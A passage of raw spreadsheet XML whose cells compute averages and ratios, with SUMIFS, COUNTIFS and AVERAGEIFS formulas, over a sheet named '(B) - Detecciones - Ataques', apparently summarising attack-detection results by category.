        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="Z163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.3471070467</v>
      </c>
      <c r="AA163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.6153846154</v>
      </c>
      <c r="AB163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AC163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.6</v>
      </c>
      <c r="AD163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.4</v>
      </c>
      <c r="AF163" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG163" s="271"/>
      <c r="AH163" s="352" t="s">
        <v>2587</v>
      </c>
      <c r="AI163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AJ163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>1</v>
      </c>
      <c r="AL163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3684210526</v>
      </c>
      <c r="AR163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1</v>
      </c>
      <c r="AW163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY163" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB163" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="BD163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="BN163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.2501933114</v>
      </c>
      <c r="BO163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="BR163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>1</v>
      </c>
      <c r="BX163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BZ163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA163" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC163" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="CJ163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="CP163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>1</v>
      </c>
      <c r="CQ163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CZ163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH163" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI163" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ163" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK163" s="271"/>
    </row>
    <row r="164">
      <c r="J164" s="277"/>
      <c r="K164" s="512"/>
      <c r="L164" s="512"/>
      <c r="M164" s="512"/>
      <c r="N164" s="512"/>
      <c r="O164" s="278"/>
      <c r="Q164" s="271"/>
      <c r="R164" s="352" t="s">
        <v>2588</v>
      </c>
      <c r="S164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.4506562253</v>
      </c>
      <c r="T164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.01424340292</v>
      </c>
      <c r="U164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.7372807018</v>
      </c>
      <c r="V164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.125</v>
      </c>
      <c r="W164" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>158.4</v>
      </c>
      <c r="Z164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>336.880148</v>
      </c>
      <c r="AA164" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BS$3:$BS$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.1759693558</v>
      </c>
